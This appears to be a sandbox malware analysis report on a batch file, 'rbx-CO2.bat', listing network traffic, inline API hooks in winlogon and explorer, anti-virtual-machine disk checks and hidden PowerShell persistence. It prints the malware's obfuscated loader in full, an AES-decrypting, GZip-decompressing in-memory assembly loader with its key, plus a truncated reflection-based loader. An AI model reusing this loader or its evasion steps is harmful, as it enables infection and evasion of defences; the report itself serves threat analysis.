Timestamp | Bytes transferred | Direction | Data
2024-10-03 12:54:47 UTC | 150 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
    Host: ipwho.is
    Connection: Keep-Alive
2024-10-03 12:54:47 UTC | 223 | IN | HTTP/1.1 200 OK
    Date: Thu, 03 Oct 2024 12:54:47 GMT
    Content-Type: application/json; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Server: ipwhois
    Access-Control-Allow-Headers: *
    X-Robots-Tag: noindex
2024-10-03 12:54:47 UTC | 1019 | IN | Data Raw: 33 65 66 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72
    Data Ascii: 3ef{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.33", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yor


Code Manipulations

Function Name | Hook Type | Active in Processes
ZwEnumerateKey | INLINE | winlogon.exe, explorer.exe
NtQuerySystemInformation | INLINE | winlogon.exe, explorer.exe
ZwResumeThread | INLINE | winlogon.exe, explorer.exe
NtDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe
ZwDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe
NtEnumerateKey | INLINE | winlogon.exe, explorer.exe
NtQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe
ZwEnumerateValueKey | INLINE | winlogon.exe, explorer.exe
ZwQuerySystemInformation | INLINE | winlogon.exe, explorer.exe
NtResumeThread | INLINE | winlogon.exe, explorer.exe
RtlGetNativeSystemInformation | INLINE | winlogon.exe, explorer.exe
NtQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe
NtEnumerateValueKey | INLINE | winlogon.exe, explorer.exe
ZwQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe
ZwQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe

Function Name | Hook Type | New Data
ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF


Target ID: 0
Start time: 08:53:41
Start date: 03/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" "
Imagebase: 0x7ff630570000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 08:53:41
Start date: 03/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 08:53:42
Start date: 03/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic diskdrive get Model
Imagebase: 0x7ff6d61e0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 4
Start time: 08:53:42
Start date: 03/10/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Imagebase: 0x7ff7c0250000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 08:53:42
Start date: 03/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic diskdrive get Manufacturer,Model
Imagebase: 0x7ff6d61e0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 08:53:42
Start date: 03/10/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Imagebase: 0x7ff7c0250000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true
Target ID: 7
Start time: 08:53:45
Start date: 03/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
                                          Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Imagebase: 0x7ff630570000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 08:53:45
Start date: 03/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -WindowStyle Hidden
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 08:53:53
Start date: 03/10/2024
Path: C:\Windows\System32\WerFault.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WerFault.exe -u -p 6444 -s 2396
Imagebase: 0x7ff6b7c80000
File size: 570'736 bytes
MD5 hash: FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 08:54:07
Start date: 03/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Imagebase: 0x7ff630570000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 08:54:07
Start date: 03/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 15
Start time: 08:54:07
Start date: 03/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Imagebase: 0x7ff630570000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 08:54:07
Start date: 03/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -WindowStyle Hidden
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 08:54:08
Start date: 03/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Imagebase: 0x7ff630570000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 18
Start time: 08:54:08
Start date: 03/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 19
Start time: 08:54:08
Start date: 03/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic diskdrive get Model
Imagebase: 0x7ff6d61e0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 08:54:08
Start date: 03/10/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Imagebase: 0x7ff7c0250000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 08:54:09
Start date: 03/10/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic diskdrive get Manufacturer,Model
Imagebase: 0x7ff6d61e0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 08:54:09
Start date: 03/10/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Imagebase: 0x7ff7c0250000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 08:54:28
Start date: 03/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
                                          Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
                                          Imagebase:0x7ff630570000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:25
                                          Start time:08:54:28
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell.exe -WindowStyle Hidden
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:27
                                          Start time:08:54:34
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\WerFault.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7088 -s 2212
                                          Imagebase:0x7ff6b7c80000
                                          File size:570'736 bytes
                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:29
                                          Start time:08:54:39
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\WerFault.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7088 -s 2104
                                          Imagebase:0x7ff6b7c80000
                                          File size:570'736 bytes
                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:30
                                          Start time:08:54:40
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\schtasks.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                          Imagebase:0x7ff716430000
                                          File size:235'008 bytes
                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:31
                                          Start time:08:54:40
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:32
                                          Start time:08:54:43
                                          Start date:03/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                          Imagebase:0x6d0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:33
                                          Start time:08:54:43
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:34
                                          Start time:08:54:43
                                          Start date:03/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                          Imagebase:0x6d0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:35
                                          Start time:08:54:43
                                          Start date:03/10/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                          Imagebase:0x6d0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:36
                                          Start time:08:54:43
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$YOhLAkBIOfDYUh=$tBOzPEeXdclpo.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+''+'r'+''+'o'+''+[Char](99)+'A'+'d'+''+[Char](100)+'re'+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DyGxdRsDFLitOyBSDtJ=thuUFdhjXkHq @([String])([IntPtr]);$xwWcsbJiItNzaRumjCNQuH=thuUFdhjXkHq 